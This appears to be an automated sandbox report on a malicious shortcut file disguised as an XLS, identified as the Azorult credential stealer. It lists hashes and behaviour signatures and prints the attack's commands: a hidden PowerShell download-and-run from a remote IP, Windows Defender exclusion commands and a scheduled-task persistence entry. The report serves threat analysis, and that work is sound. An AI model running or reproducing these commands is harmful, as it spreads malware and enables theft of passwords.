Analysis
-
max time kernel
139s -
max time network
102s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-10-2024 07:11
Static task
static1
Behavioral task
behavioral1
Sample
AWB-002024563.XLS.lnk
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
AWB-002024563.XLS.lnk
Resource
win10v2004-20241007-en
General
-
Target
AWB-002024563.XLS.lnk
-
Size
1KB
-
MD5
24b35581ca3b4d40271e57c85e296acb
-
SHA1
06772cefa2064960b2db126373dc65cb39aca466
-
SHA256
9b2a9d2d3db782a88b2db346864bb53ab0e08b02463555f9cd394327d1d41414
-
SHA512
4d828fe1d9bed99f9616f84cce7893ea69923f07dd75a3da8e1e5b2bb840ddaa642aa8187721d0a198c1700413df4c79387419c7376a8d704e7bfb644d18c1da
Malware Config
Extracted
azorult
http://h8m5b.shop/ML341/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 8 2352 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 4740 powershell.exe 3480 powershell.exe 2352 powershell.exe 2352 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exesetup_x86.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation setup_x86.exe -
Executes dropped EXE 1 IoCs
Processes:
setup_x86.exepid process 2336 setup_x86.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
setup_x86.exedescription pid process target process PID 2336 set thread context of 4364 2336 setup_x86.exe MSBuild.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
setup_x86.exepowershell.exepowershell.exeschtasks.exeMSBuild.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_x86.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exesetup_x86.exepowershell.exepowershell.exepid process 2352 powershell.exe 2352 powershell.exe 2336 setup_x86.exe 2336 setup_x86.exe 2336 setup_x86.exe 2336 setup_x86.exe 2336 setup_x86.exe 2336 setup_x86.exe 3480 powershell.exe 3480 powershell.exe 4740 powershell.exe 4740 powershell.exe 2336 setup_x86.exe 2336 setup_x86.exe 2336 setup_x86.exe 2336 setup_x86.exe 3480 powershell.exe 4740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exesetup_x86.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2352 powershell.exe Token: SeDebugPrivilege 2336 setup_x86.exe Token: SeDebugPrivilege 4740 powershell.exe Token: SeDebugPrivilege 3480 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
cmd.exepowershell.exesetup_x86.exedescription pid process target process PID 2648 wrote to memory of 2352 2648 cmd.exe powershell.exe PID 2648 wrote to memory of 2352 2648 cmd.exe powershell.exe PID 2352 wrote to memory of 2336 2352 powershell.exe setup_x86.exe PID 2352 wrote to memory of 2336 2352 powershell.exe setup_x86.exe PID 2352 wrote to memory of 2336 2352 powershell.exe setup_x86.exe PID 2336 wrote to memory of 4740 2336 setup_x86.exe powershell.exe PID 2336 wrote to memory of 4740 2336 setup_x86.exe powershell.exe PID 2336 wrote to memory of 4740 2336 setup_x86.exe powershell.exe PID 2336 wrote to memory of 3480 2336 setup_x86.exe powershell.exe PID 2336 wrote to memory of 3480 2336 setup_x86.exe powershell.exe PID 2336 wrote to memory of 3480 2336 setup_x86.exe powershell.exe PID 2336 wrote to memory of 116 2336 setup_x86.exe schtasks.exe PID 2336 wrote to memory of 116 2336 setup_x86.exe schtasks.exe PID 2336 wrote to memory of 116 2336 setup_x86.exe schtasks.exe PID 2336 wrote to memory of 2552 2336 setup_x86.exe MSBuild.exe PID 2336 wrote to memory of 2552 2336 setup_x86.exe MSBuild.exe PID 2336 wrote to memory of 2552 2336 setup_x86.exe MSBuild.exe PID 2336 wrote to memory of 4364 2336 setup_x86.exe MSBuild.exe PID 2336 wrote to memory of 4364 2336 setup_x86.exe MSBuild.exe PID 2336 wrote to memory of 4364 2336 setup_x86.exe MSBuild.exe PID 2336 wrote to memory of 4364 2336 setup_x86.exe MSBuild.exe PID 2336 wrote to memory of 4364 2336 setup_x86.exe MSBuild.exe PID 2336 wrote to memory of 4364 2336 setup_x86.exe MSBuild.exe PID 2336 wrote to memory of 4364 2336 setup_x86.exe MSBuild.exe PID 2336 wrote to memory of 4364 2336 setup_x86.exe MSBuild.exe PID 2336 wrote to memory of 4364 2336 setup_x86.exe MSBuild.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\AWB-002024563.XLS.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://217.160.121.141:8030/5643254657/Crypted.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Users\Admin\Downloads\setup_x86.exe"C:\Users\Admin\Downloads\setup_x86.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\setup_x86.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4740
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\sXACnJccZk.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sXACnJccZk" /XML "C:\Users\Admin\AppData\Local\Temp\tmp14DB.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:116
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:2552
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4364
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD51bb4393b75f85feb35de7e5575e44926
SHA1bf6c8db59380d8b126b10c5cf26c2fc994863f55
SHA256308c0b6304d95ab1613b601ce009e11febf4c8c334c017911b31b5fcd27ffbf9
SHA5125bead895158fd1fb0cc8d730e2280b5d9aab875121946c97cbf97ef4ac8b3c6fb9699aac7a0cf5a389d1cff5b4dd25717e3df5b30ebddc7de5ac6b4d2a40a5bc
-
Filesize
1KB
MD58d80c45e0e047b75073a3d1c2710c68f
SHA1babc73cf30327b36d184239a2747ec94d48929f4
SHA2566859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64
SHA5125da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5ad8a40b4acb6acabea7f66d1021c182a
SHA1b913f4c21e819b4ab3ac82839e9f0c7f38696560
SHA256c99ebe8c2b0f4fb6ac4fcf289f1bb60c9615e067d9737c6e67976878e8416a83
SHA5125014935cd39d4e398c5d8eb446a86546f31efffa1a37b879cb31504acc75b10306f6b096ecb705e7bee598e07d7cd67a81a0812f6ff44383a97cff638a7e3970
-
Filesize
584KB
MD57c79a1035c5735d3d0b304564a33ba1a
SHA1ecf62b17647c2db020119168e0eb12aa16984bc8
SHA256c9f9cac249b944a81dcaf942997c774b267cd4b27d64318dd5d91583274098f1
SHA512c86a3f3d311f1f512f4dda2dc768a85bbe5fd5473a62a0b9a1232490c656588e333a8906be2d2971fd39a6e389a211c886857a443b31a0a951b47c2f0b75229b